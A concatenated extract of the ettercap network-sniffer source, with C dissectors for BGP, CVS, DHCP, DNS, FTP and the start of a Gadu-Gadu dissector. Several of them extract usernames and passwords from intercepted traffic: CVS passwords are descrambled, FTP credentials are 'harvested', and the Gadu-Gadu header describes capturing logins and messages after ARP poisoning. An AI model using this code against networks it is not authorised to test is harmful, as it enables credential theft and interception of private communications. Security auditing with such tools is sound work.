/* ettercap -- dissector BGP 4 -- TCP 179 Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ /* * * BPG version 4 RFC 1771 * * 0 1 2 3 * 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 * +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ * 0 | | * + + * 4 | | * + Marker + * 8 | | * + + * 12 | | * +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ * 16 | Length | Type | Version | * +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ * 20 | My Autonomous System | Hold Time | * +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ * 24 | BGP Identifier | * +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ * 28 | Opt Parm Len | | * +-+-+-+-+-+-+-+-+ Optional Parameters | * 32 | | * | | * ~ ~ * +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ * * 0 1 * 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 * +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-... * | Parm. Type | Parm. Length | Parameter Value (variable) * +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-... * * * a) Authentication Information (Parameter Type 1): * * This optional parameter may be used to authenticate a BGP * peer. The Parameter Value field contains a 1-octet * Authentication Code followed by a variable length * Authentication Data. * * 0 1 2 3 4 5 6 7 8 * +-+-+-+-+-+-+-+-+ * | Auth. Code | * +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ * | | * | Authentication Data | * | | * +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ * * Authentication Code: * * This 1-octet unsigned integer indicates the * authentication mechanism being used. Whenever an * authentication mechanism is specified for use within * BGP, three things must be included in the * specification: * * - the value of the Authentication Code which indicates * use of the mechanism, * - the form and meaning of the Authentication Data, and * - the algorithm for computing values of Marker fields. * * Note that a separate authentication mechanism may be * used in establishing the transport level connection. * * Authentication Data: * * The form and meaning of this field is a variable- * length field depend on the Authentication Code. * */ #include #include #include /* protos */ FUNC_DECODER(dissector_bgp); void bgp_init(void); /************************************************/ /* * this function is the initializer. * it adds the entry in the table of registered decoder */ void __init bgp_init(void) { dissect_add("bgp", APP_LAYER_TCP, 179, dissector_bgp); } FUNC_DECODER(dissector_bgp) { DECLARE_DISP_PTR_END(ptr, end); char tmp[MAX_ASCII_ADDR_LEN]; u_char *parameters; u_char param_length; u_int32 i; u_char BGP_MARKER[] = {0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF}; /* don't complain about unused var */ (void)end; (void) DECODE_DATA; (void) DECODE_DATALEN; (void) DECODED_LEN; /* skip packets that don't have enough data */ if (PACKET->DATA.len < 30) return NULL; /* not the right version (4) */ if ( ptr[19] != 4 ) return 0; /* not an OPEN message */ if ( ptr[18] != 1 ) return 0; /* BGP marker has to be FFFFFF... */ if ( memcmp(ptr, BGP_MARKER, 16) ) return 0; /* no optional parameter */ if ( (param_length = ptr[28]) == 0 ) return 0; /* skip to parameters */ parameters = ptr + 29; if ((ptr + param_length) > end) return 0; DEBUG_MSG("BGP --> TCP dissector_bgp"); /* move through the param list */ for ( i = 0; i <= param_length; i += (parameters[i + 1] + 2) ) { /* the parameter is an authentication type (1) */ if (parameters[i] == 1) { char *str_ptr; u_int32 j; u_int32 length = parameters[i + 1]; DEBUG_MSG("\tDissector_BGP 4 AUTH"); PACKET->DISSECTOR.user = strdup("BGP4"); SAFE_CALLOC(PACKET->DISSECTOR.pass, length * 3 + 10, sizeof(char)); SAFE_CALLOC(PACKET->DISSECTOR.info, 32, sizeof(char)); /* Get authentication type */ snprintf(PACKET->DISSECTOR.info, 32, "AUTH TYPE [0x%02x]", parameters[i+2]); /* Get authentication data */ if (length > 1) { snprintf(PACKET->DISSECTOR.pass, 5, "Hex("); str_ptr = PACKET->DISSECTOR.pass + strlen(PACKET->DISSECTOR.pass); for (j = 0; j < (length-1); j++) { //u_int32 k = j+3; u_char *temp = parameters + i + j + 3; size_t temp_len = strlen((char *)temp) + 2; snprintf(str_ptr + (j * 3), temp_len, " %.2x", *temp); } strcat(str_ptr, " )"); } DISSECT_MSG("BGP : %s:%d -> %s %s\n", ip_addr_ntoa(&PACKET->L3.dst, tmp), ntohs(PACKET->L4.dst), PACKET->DISSECTOR.info, PACKET->DISSECTOR.pass); return NULL; } } return NULL; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/dissectors/ec_cvs.c000664 000000 000000 00000011020 13711276346 020033 0ustar00rootroot000000 000000 /* ettercap -- dissector CVS -- TCP 2401 Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include /* globals */ /* stolen from CVS scramble.c */ static u_char cvs_shifts[] = { 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 114,120, 53, 79, 96,109, 72,108, 70, 64, 76, 67,116, 74, 68, 87, 111, 52, 75,119, 49, 34, 82, 81, 95, 65,112, 86,118,110,122,105, 41, 57, 83, 43, 46,102, 40, 89, 38,103, 45, 50, 42,123, 91, 35, 125, 55, 54, 66,124,126, 59, 47, 92, 71,115, 78, 88,107,106, 56, 36,121,117,104,101,100, 69, 73, 99, 63, 94, 93, 39, 37, 61, 48, 58,113, 32, 90, 44, 98, 60, 51, 33, 97, 62, 77, 84, 80, 85,223, 225,216,187,166,229,189,222,188,141,249,148,200,184,136,248,190, 199,170,181,204,138,232,218,183,255,234,220,247,213,203,226,193, 174,172,228,252,217,201,131,230,197,211,145,238,161,179,160,212, 207,221,254,173,202,146,224,151,140,196,205,130,135,133,143,246, 192,159,244,239,185,168,215,144,139,165,180,157,147,186,214,176, 227,231,219,169,175,156,206,198,129,164,150,210,154,177,134,127, 182,128,158,208,162,132,167,209,149,241,153,251,237,236,171,195, 243,233,253,240,194,250,191,155,142,137,245,235,163,242,178,152 }; #define CVS_LOGIN "BEGIN VERIFICATION REQUEST" /* protos */ FUNC_DECODER(dissector_cvs); void cvs_init(void); /************************************************/ /* * this function is the initializer. * it adds the entry in the table of registered decoder */ void __init cvs_init(void) { dissect_add("cvs", APP_LAYER_TCP, 2401, dissector_cvs); } FUNC_DECODER(dissector_cvs) { DECLARE_DISP_PTR_END(ptr, end); char tmp[MAX_ASCII_ADDR_LEN]; u_char *p; size_t i; /* don't complain about unused var */ (void)end; (void) DECODE_DATA; (void) DECODE_DATALEN; (void) DECODED_LEN; /* skip messages coming from the server */ if (FROM_SERVER("cvs", PACKET)) return NULL; /* skip empty packets (ACK packets) */ if (PACKET->DATA.len == 0) return NULL; /* not a login packet */ if ( strncmp((const char*)ptr, CVS_LOGIN, strlen(CVS_LOGIN)) ) return NULL; DEBUG_MSG("CVS --> TCP dissector_cvs"); /* move over the cvsroot path */ ptr += strlen(CVS_LOGIN) + 1; if (ptr >= end) return NULL; /* go until \n */ while(*ptr != '\n' && ptr != end) ptr++; if (ptr == end) return NULL; PACKET->DISSECTOR.user = strdup((const char*)++ptr); /* cut the username on \n */ if ( (p = strchr(PACKET->DISSECTOR.user, '\n')) != NULL ) *p = '\0'; /* go until \n */ while(*ptr != '\n' && ptr != end) ptr++; if (ptr == end) return NULL; /* unsupported scramble method */ if (*(++ptr) != 'A') return NULL; PACKET->DISSECTOR.pass = strdup((const char*)ptr); /* cut the username on \n */ if ( (p = strchr(PACKET->DISSECTOR.pass, '\n')) != NULL ) *p = '\0'; /* no password */ if (strlen(PACKET->DISSECTOR.pass) == 1 && PACKET->DISSECTOR.pass[0] == 'A') { SAFE_FREE(PACKET->DISSECTOR.pass); PACKET->DISSECTOR.pass = strdup("(empty)"); } else { p = PACKET->DISSECTOR.pass; /* descramble the password */ for (i = 1; i < sizeof(cvs_shifts) - 1 && p[i]; i++) p[i] = cvs_shifts[(size_t)p[i]]; /* shift it to the left to eliminate the 'A' */ for (i = 0; p[i]; i++) p[i] = p[i + 1]; } /* final message */ DISSECT_MSG("CVS : %s:%d -> USER: %s PASS: %s\n", ip_addr_ntoa(&PACKET->L3.dst, tmp), ntohs(PACKET->L4.dst), PACKET->DISSECTOR.user, PACKET->DISSECTOR.pass); return NULL; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/dissectors/ec_dhcp.c000664 000000 000000 00000025660 13711276346 020175 0ustar00rootroot000000 000000 /* ettercap -- dissector DHCP -- UDP 67 Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ /* * RFC: 2131 * * 0 1 2 3 * 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 * +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ * | op (1) | htype (1) | hlen (1) | hops (1) | * +---------------+---------------+---------------+---------------+ * | xid (4) | * +-------------------------------+-------------------------------+ * | secs (2) | flags (2) | * +-------------------------------+-------------------------------+ * | ciaddr (4) | * +---------------------------------------------------------------+ * | yiaddr (4) | * +---------------------------------------------------------------+ * | siaddr (4) | * +---------------------------------------------------------------+ * | giaddr (4) | * +---------------------------------------------------------------+ * | chaddr (16) | * +---------------------------------------------------------------+ * | sname (64) | * +---------------------------------------------------------------+ * | file (128) | * +---------------------------------------------------------------+ * | options (variable) | * +---------------------------------------------------------------+ */ #include #include #include #include /* globalse */ struct dhcp_hdr { u_int8 op; #define BOOTREQUEST 1 #define BOOTREPLY 2 u_int8 htype; u_int8 hlen; u_int8 hops; u_int32 id; u_int16 secs; u_int16 flags; u_int32 ciaddr; u_int32 yiaddr; u_int32 siaddr; u_int32 giaddr; u_int8 chaddr[16]; u_int8 sname[64]; u_int8 file[128]; u_int32 magic; }; /* protos */ FUNC_DECODER(dissector_dhcp); void dhcp_init(void); u_int8 * get_dhcp_option(u_int8 opt, u_int8 *ptr, u_int8 *end); void put_dhcp_option(u_int8 opt, u_int8 *value, u_int8 len, u_int8 **ptr); static void dhcp_add_profile(struct ip_addr *sa, size_t flag); /************************************************/ /* * this function is the initializer. * it adds the entry in the table of registered decoder */ void __init dhcp_init(void) { dissect_add("dhcp", APP_LAYER_UDP, 67, dissector_dhcp); } FUNC_DECODER(dissector_dhcp) { DECLARE_DISP_PTR_END(ptr, end); char tmp[MAX_ASCII_ADDR_LEN]; struct dhcp_hdr *dhcp; u_int8 *options, *opt; /* don't complain about unused var */ (void) DECODE_DATA; (void) DECODE_DATALEN; (void) DECODED_LEN; /* sanity check */ if (PACKET->DATA.len < sizeof(struct dhcp_hdr)) return NULL; DEBUG_MSG("DHCP --> UDP 68 dissector_dhcp"); /* cast the header and options */ dhcp = (struct dhcp_hdr *)ptr; options = (u_int8 *)(dhcp + 1); /* check for the magic cookie */ if (dhcp->magic != htonl(DHCP_MAGIC_COOKIE)) return NULL; end = ptr + PACKET->DATA.len; /* search the "message type" option */ opt = get_dhcp_option(DHCP_OPT_MSG_TYPE, options, end); /* option not found */ if (opt == NULL) return NULL; /* client requests */ if (FROM_CLIENT("dhcp", PACKET)) { struct ip_addr client; /* clients only send request */ if (dhcp->op != BOOTREQUEST) return NULL; switch (*(opt + 1)) { case DHCP_DISCOVER: DEBUG_MSG("\tDissector_DHCP DISCOVER"); DISSECT_MSG("DHCP: [%s] DISCOVER \n", mac_addr_ntoa(dhcp->chaddr, tmp)); /* HOOK POINT: HOOK_PROTO_DHCP_DISCOVER */ hook_point(HOOK_PROTO_DHCP_DISCOVER, PACKET); break; case DHCP_REQUEST: DEBUG_MSG("\tDissector_DHCP REQUEST"); /* requested ip address */ if ((opt = get_dhcp_option(DHCP_OPT_RQ_ADDR, options, end)) != NULL) { if ((opt + 5) >= end) { // not enough room for an ip address return NULL; } ip_addr_init(&client, AF_INET, opt + 1); } else { /* search if the client already has the ip address */ if (dhcp->ciaddr != 0) { ip_addr_init(&client, AF_INET, (u_char *)&dhcp->ciaddr); } else return NULL; } DISSECT_MSG("DHCP: [%s] REQUEST ", mac_addr_ntoa(dhcp->chaddr, tmp)); DISSECT_MSG("%s\n", ip_addr_ntoa(&client, tmp)); /* HOOK POINT: HOOK_PROTO_DHCP_REQUEST */ hook_point(HOOK_PROTO_DHCP_REQUEST, PACKET); break; } /* server replies */ } else { struct ip_addr netmask; struct ip_addr router; struct ip_addr client; struct ip_addr dns; char domain[64]; char resp; /* servers only send replies */ if (dhcp->op != BOOTREPLY) return NULL; memset(domain, 0, sizeof(domain)); memset(&netmask, 0, sizeof(struct ip_addr)); memset(&router, 0, sizeof(struct ip_addr)); memset(&client, 0, sizeof(struct ip_addr)); memset(&dns, 0, sizeof(struct ip_addr)); resp = *(opt + 1); switch (resp) { case DHCP_ACK: case DHCP_OFFER: if (resp == DHCP_ACK) DEBUG_MSG("\tDissector_DHCP ACK"); else { DEBUG_MSG("\tDissector_DHCP OFFER"); } /* get the assigned ip */ ip_addr_init(&client, AF_INET, (u_char *)&dhcp->yiaddr ); /* netmask */ if ((opt = get_dhcp_option(DHCP_OPT_NETMASK, options, end)) != NULL) ip_addr_init(&netmask, AF_INET, opt + 1); /* default gateway */ if ((opt = get_dhcp_option(DHCP_OPT_ROUTER, options, end)) != NULL) ip_addr_init(&router, AF_INET, opt + 1); /* dns server */ if ((opt = get_dhcp_option(DHCP_OPT_DNS, options, end)) != NULL) ip_addr_init(&dns, AF_INET, opt + 1); DISSECT_MSG("DHCP: [%s] %s : ", ip_addr_ntoa(&PACKET->L3.src, tmp), (resp == DHCP_ACK) ? "ACK" : "OFFER"); DISSECT_MSG("%s ", ip_addr_ntoa(&client, tmp)); DISSECT_MSG("%s ", ip_addr_ntoa(&netmask, tmp)); DISSECT_MSG("GW %s ", ip_addr_ntoa(&router, tmp)); if (!ip_addr_is_zero(&dns)) { DISSECT_MSG("DNS %s ", ip_addr_ntoa(&dns, tmp)); } /* dns domain */ if ((opt = get_dhcp_option(DHCP_OPT_DOMAIN, options, end)) != NULL) { strncpy(domain, (const char*)(opt + 1), MIN(*opt, sizeof(domain)) ); DISSECT_MSG("\"%s\"\n", domain); } else DISSECT_MSG("\n"); /* add the GW and the DNS to hosts' profiles */ if (!ip_addr_is_zero(&router)) dhcp_add_profile(&router, FP_GATEWAY | FP_HOST_LOCAL); if (!ip_addr_is_zero(&dns)) dhcp_add_profile(&dns, FP_UNKNOWN); // look for the option 81 in ack's if (resp == DHCP_ACK && (opt = get_dhcp_option(DHCP_OPT_FQDN, options, end)) != NULL) { u_char size = opt[0]; if ((opt + size + 2) > end || size < 3) { // the +2 accounts for a-rr and ptr-rr return NULL; } // check flags for the ascii encoding u_char flags = opt[1]; if (flags & 0x04) { // TODO support wire format (aka dns style) return NULL; } // create a null terminated string to pass to resolv char* name = NULL; SAFE_CALLOC(name, size - 2, sizeof(char)); memcpy(name, opt + 4, size - 2); name[size - 3] = 0; resolv_cache_insert_passive(&client, name); SAFE_FREE(name); } break; } } return NULL; } /* * return the pointer to the named option * or NULL if not found * ptr will point to the length of the option */ u_int8 * get_dhcp_option(u_int8 opt, u_int8 *ptr, u_int8 *end) { do { /* we have found our option */ if (*ptr == opt) return ptr + 1; /* * move thru options : * * OPT LEN .. .. .. OPT LEN .. .. */ ptr = ptr + 2 + (*(ptr + 1)); } while (ptr < end && *ptr != DHCP_OPT_END); return NULL; } /* * put an option into the buffer, the ptr will be * move after the options just inserted. */ void put_dhcp_option(u_int8 opt, u_int8 *value, u_int8 len, u_int8 **ptr) { u_int8 *p = *ptr; /* the options type */ *p++ = opt; /* the len of the option */ *p++ = len; /* copy the value */ memcpy(p, value, len); /* move the pointer */ p += len; *ptr = p; } /* * create a fake packet object to feed the profile_parse function */ static void dhcp_add_profile(struct ip_addr *sa, size_t flag) { struct packet_object po; DEBUG_MSG("dhcp_add_profile"); /* wipe the object */ memset(&po, 0, sizeof(struct packet_object)); memcpy(&po.L3.src, sa, sizeof(struct ip_addr)); /* this is a ludicrious(tm) lie ! * in order to add the host to the profiles we pretend * to have seen an icmp from it */ po.L4.proto = NL_TYPE_ICMP; po.PASSIVE.flags = flag; /* HOOK POINT: HOOK_PROTO_DHCP_PROFILE */ /* used by profile_parse and log_packet */ hook_point(HOOK_PROTO_DHCP_PROFILE, &po); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/dissectors/ec_dns.c000664 000000 000000 00000016260 13711276346 020037 0ustar00rootroot000000 000000 /* ettercap -- dissector DNS -- UDP 53 Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include /* * 1 1 1 1 1 1 * 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 * +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+ * | ID | * +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+ * |QR| Opcode |AA|TC|RD|RA| Z | RCODE | * +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+ * | QDCOUNT | * +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+ * | ANCOUNT | * +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+ * | NSCOUNT | * +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+ * | ARCOUNT | * +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+ */ struct dns_header { u_int16 id; /* DNS packet ID */ #ifdef WORDS_BIGENDIAN u_char qr: 1; /* response flag */ u_char opcode: 4; /* purpose of message */ u_char aa: 1; /* authoritative answer */ u_char tc: 1; /* truncated message */ u_char rd: 1; /* recursion desired */ u_char ra: 1; /* recursion available */ u_char unused: 1; /* unused bits */ u_char ad: 1; /* authentic data from named */ u_char cd: 1; /* checking disabled by resolver */ u_char rcode: 4; /* response code */ #else /* WORDS_LITTLEENDIAN */ u_char rd: 1; /* recursion desired */ u_char tc: 1; /* truncated message */ u_char aa: 1; /* authoritative answer */ u_char opcode: 4; /* purpose of message */ u_char qr: 1; /* response flag */ u_char rcode: 4; /* response code */ u_char cd: 1; /* checking disabled by resolver */ u_char ad: 1; /* authentic data from named */ u_char unused: 1; /* unused bits */ u_char ra: 1; /* recursion available */ #endif u_int16 num_q; /* Number of questions */ u_int16 num_answer; /* Number of answer resource records */ u_int16 num_auth; /* Number of authority resource records */ u_int16 num_res; /* Number of additional resource records */ }; #define DNS_HEADER_LEN 0xc /* 12 bytes */ /* protos */ FUNC_DECODER(dissector_dns); void dns_init(void); /************************************************/ /* * this function is the initializer. * it adds the entry in the table of registered decoder */ void __init dns_init(void) { dissect_add("dns", APP_LAYER_UDP, 53, dissector_dns); } FUNC_DECODER(dissector_dns) { struct dns_header *dns; u_char *data, *end; char name[NS_MAXDNAME], alias[NS_MAXDNAME]; int name_len, i; u_char *q; int16 class, type, a_len; int32 ttl; /* don't complain about unused var */ (void) DECODE_DATA; (void) DECODE_DATALEN; (void) DECODED_LEN; (void) ttl; DEBUG_MSG("DNS --> UDP 53 dissector_dns"); dns = (struct dns_header *)po->DATA.data; data = (u_char *)(dns + 1); end = (u_char *)dns + po->DATA.len; /* initialize the name */ memset(name, 0, sizeof(name)); memset(alias, 0, sizeof(alias)); /* extract the name from the packet */ name_len = dn_expand((u_char *)dns, end, data, name, sizeof(name)); /* thre was an error */ if (name_len < 0) return NULL; q = data + name_len; /* get the type and class */ NS_GET16(type, q); NS_GET16(class, q); /* handle only internet class */ if (class != ns_c_in) return NULL; /* HOOK POINT: HOOK_PROTO_DNS */ hook_point(HOOK_PROTO_DNS, PACKET); /* this is a DNS answer */ if (dns->qr && dns->rcode == ns_r_noerror && htons(dns->num_answer) > 0) { for (i = 0; i <= ntohs(dns->num_answer); i++) { /* * decode the answer * keep the name separated from aliases... */ if (i == 0) name_len = dn_expand((u_char *)dns, end, q, name, sizeof(name)); else name_len = dn_expand((u_char *)dns, end, q, alias, sizeof(alias)); /* thre was an error */ if (name_len < 0) return NULL; /* update the pointer */ q += name_len; NS_GET16(type, q); NS_GET16(class, q); NS_GET32(ttl, q); NS_GET16(a_len, q); /* only internet class */ if (class != ns_c_in) return NULL; /* alias */ if (type == ns_t_cname || type == ns_t_ptr) { name_len = dn_expand((u_char *)dns, end, q, alias, sizeof(alias)); q += a_len; } /* name to ip */ if (type == ns_t_a) { int32 addr; struct ip_addr ip; char aip[MAX_ASCII_ADDR_LEN]; /* get the address */ NS_GET32(addr, q); /* convert to network order */ addr = htonl(addr); ip_addr_init(&ip, AF_INET, (u_char *)&addr); /* insert the answer in the resolv cache */ resolv_cache_insert_passive(&ip, name); /* display the user message */ ip_addr_ntoa(&ip, aip); //DISSECT_MSG("DNS: %s ->> %s ->> %s\n", name, alias, aip); DEBUG_MSG("DNS: %s ->> %s ->> %s\n", name, alias, aip); } else if (type == ns_t_aaaa) { u_int16 addr[8]; struct ip_addr ip; char aip[MAX_ASCII_ADDR_LEN]; int i = 0; /* IPv6 address - get the bytes in reverse order*/ for (i=0; i<8; i++) { NS_GET16(addr[i], q); addr[i] = htons(addr[i]); } ip_addr_init(&ip, AF_INET6, (u_char*)&addr); /* insert the answer in the resolv cache */ resolv_cache_insert_passive(&ip, name); /* prepare ip address for user message */ ip_addr_ntoa(&ip, aip); /* display the user message */ //DISSECT_MSG("DNS: %s ->> %s ->> %s\n", name, alias, aip); DEBUG_MSG("DNS: %s ->> %s ->> %s\n", name, alias, aip); } } } return NULL; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/dissectors/ec_ftp.c000664 000000 000000 00000010777 13711276346 020053 0ustar00rootroot000000 000000 /* ettercap -- dissector FTP -- TCP 21 990 Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #include /* protos */ FUNC_DECODER(dissector_ftp); void ftp_init(void); /************************************************/ /* * this function is the initializer. * it adds the entry in the table of registered decoder */ void __init ftp_init(void) { dissect_add("ftp", APP_LAYER_TCP, 21, dissector_ftp); sslw_dissect_add("ftps", 990, dissector_ftp, SSL_ENABLED); } FUNC_DECODER(dissector_ftp) { DECLARE_DISP_PTR_END(ptr, end); struct ec_session *s = NULL; void *ident = NULL; char tmp[MAX_ASCII_ADDR_LEN]; /* don't complain about unused var */ (void) DECODE_DATA; (void) DECODE_DATALEN; (void) DECODED_LEN; /* the connection is starting... create the session */ CREATE_SESSION_ON_SYN_ACK("ftp", s, dissector_ftp); /* check if it is the first packet sent by the server */ IF_FIRST_PACKET_FROM_SERVER("ftp", s, ident, dissector_ftp) { DEBUG_MSG("\tdissector_ftp BANNER"); /* * get the banner * ptr + 4 to skip the initial 220 response */ if (!strncmp((const char*)ptr, "220", 3)) { PACKET->DISSECTOR.banner = strdup((const char*)ptr + 4); /* remove the \r\n */ if ( (ptr = (u_char*)strchr(PACKET->DISSECTOR.banner, '\r')) != NULL ) *ptr = '\0'; } } ENDIF_FIRST_PACKET_FROM_SERVER(s, ident) /* skip empty packets (ACK packets) */ if (PACKET->DATA.len == 0) return NULL; /* skip messages coming from the server */ if (FROM_SERVER("ftp", PACKET)) return NULL; DEBUG_MSG("FTP --> TCP dissector_ftp"); /* skip the whitespaces at the beginning */ while(*ptr == ' ' && ptr != end) ptr++; /* reached the end */ if (ptr == end) return NULL; /* harvest the username */ if ( !strncasecmp((const char*)ptr, "USER ", 5) ) { DEBUG_MSG("\tDissector_FTP USER"); /* create the session */ dissect_create_session(&s, PACKET, DISSECT_CODE(dissector_ftp)); ptr += 5; /* if not null, free it */ SAFE_FREE(s->data); /* fill the session data */ s->data = strdup((const char*)ptr); s->data_len = strlen((const char*)ptr); if ( (ptr = (u_char*)strchr(s->data,'\r')) != NULL ) *ptr = '\0'; /* save the session */ session_put(s); return NULL; } /* harvest the password */ if ( !strncasecmp((const char*)ptr, "PASS ", 5) ) { DEBUG_MSG("\tDissector_FTP PASS"); ptr += 5; /* create an ident to retrieve the session */ dissect_create_ident(&ident, PACKET, DISSECT_CODE(dissector_ftp)); /* retrieve the session and delete it */ if (session_get_and_del(&s, ident, DISSECT_IDENT_LEN) == -E_NOTFOUND) { SAFE_FREE(ident); return NULL; } /* check that the user was sent before the pass */ if (s->data == NULL) { SAFE_FREE(ident); return NULL; } /* fill the structure */ PACKET->DISSECTOR.user = strdup(s->data); PACKET->DISSECTOR.pass = strdup((const char*)ptr); if ( (ptr = (u_char*)strchr(PACKET->DISSECTOR.pass, '\r')) != NULL ) *ptr = '\0'; /* free the session */ session_free(s); SAFE_FREE(ident); DISSECT_MSG("FTP : %s:%d -> USER: %s PASS: %s\n", ip_addr_ntoa(&PACKET->L3.dst, tmp), ntohs(PACKET->L4.dst), PACKET->DISSECTOR.user, PACKET->DISSECTOR.pass); return NULL; } return NULL; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/dissectors/ec_gg.c000664 000000 000000 00000054300 13711276346 017645 0ustar00rootroot000000 000000 /* ettercap -- dissector gadu-gadu -- TCP 8074 (alternatively 443) Copyright (C) Michal Szymanski gg: 7244283 This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ /* ABOUT: ettercap-gg is a Gadu-Gadu IM ettercap dissector. It is a patch for ettercap sniffer that adds the ability to intercept Gadu-Gadu logins, passwords and messages. Gadu-Gadu (http://www.gadu-gadu.pl/) is the most widely used IM network in Poland with ~6mln users. Protocol description taken from http://ekg.chmurka.net/docs/protocol.html + own research (7.x). The newest version can be found at https://www.ettercap-project.org/downloads.html FEATURES: - supports following gadu-gadu protocols: 4.x, 5.x, 6.x, 7.x - intercepts sent/received messages - intercepts gg numbers, password hashes and seeds (can be bruteforced by ggbrute) - intercepts status descriptions - notifies about status changes - intercepts gg server/client ip addresses - intercepts gg user's local/remote ip addresses - intercepts gg connections to port 8074 and 443 - determines Gadu-Gadu version INSTALLATION & CONFIGURATION: Apply Gadu-Gadu dissector patch and compile ettercap as you used to do before: patch -p0 < ettercap-NG-0.7.3-gg_dissector_02.patch ./configure make make install Normally Gadu-Gadu dissector is installed on port number 8074 (appropriate entry is added to etter.conf file). If you want to enable dissector to intercept traffic on port 443 just turn off https dissector (there can be only one dissector on the same port at the same time) by editing etter.conf file and changing following line: https = 443 # tcp 443 to https = 0 # tcp 443 After that all you need to do is to add 443 port to gg dissector: gg = 8074,443 # tcp 8074 That's all. Play wisely. */ /* EXAMPLE SESSION (with GG_CONTACTS_STATUS_CHANGES enabled) - version 0.2: ARP poisoning victims: GROUP 1 : 10.10.10.11 00:01:20:02:34:21 GROUP 2 : 10.10.10.1 00:0A:84:D8:28:F5 Starting Unified sniffing... Text only Interface activated... Hit 'h' for inline help GG : 217.17.45.143:443 -> 